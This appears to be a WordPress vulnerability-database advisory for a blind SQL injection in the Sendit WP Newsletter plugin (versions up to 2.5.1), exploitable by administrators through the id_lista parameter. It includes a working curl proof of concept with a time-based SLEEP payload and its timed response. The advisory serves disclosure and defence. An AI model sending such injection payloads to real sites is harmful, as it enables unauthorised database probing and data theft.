WordPress Plugin Vulnerabilities
Sendit WP Newsletter <= 2.5.1 - Authenticated (admin+) SQL Injection
Description
The page lists-management feature of the plugin, available to Administrator users does not sanitise, validate or escape the id_lista POST parameter before using it in SQL statement, therefore leading to Blind SQL Injection.
Proof of Concept
time curl -i -s -k -X $'POST' \ -H $'Upgrade-Insecure-Requests: 1' -H $'Origin: https://example.com' -H $'Content-Type: application/x-www-form-urlencoded' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36' -H $'Referer: https://example.com/wp-admin/admin.php?page=lists-management&delete=1&id_lista=1' \ -b $'[admin user]' \ --data-binary $'id_lista=1-IF(MID(VERSION(),1,1)=8,SLEEP(10),0)&com=DEL' \ $'https://example.com/wp-admin/admin.php?page=lists-management' Response: <div class="clear"></div></div><!-- wpwrap --> <script type="text/javascript">if(typeof wpOnload=='function')wpOnload();</script> </body> </html> 0.01s user 0.00s system 0% cpu 20.279 total
Affects Plugins
References
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Shreya Pohekar of Codevigilant Project
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-05-27 (about 2 years ago)
Added
2021-05-27 (about 2 years ago)
Last Updated
2021-05-28 (about 2 years ago)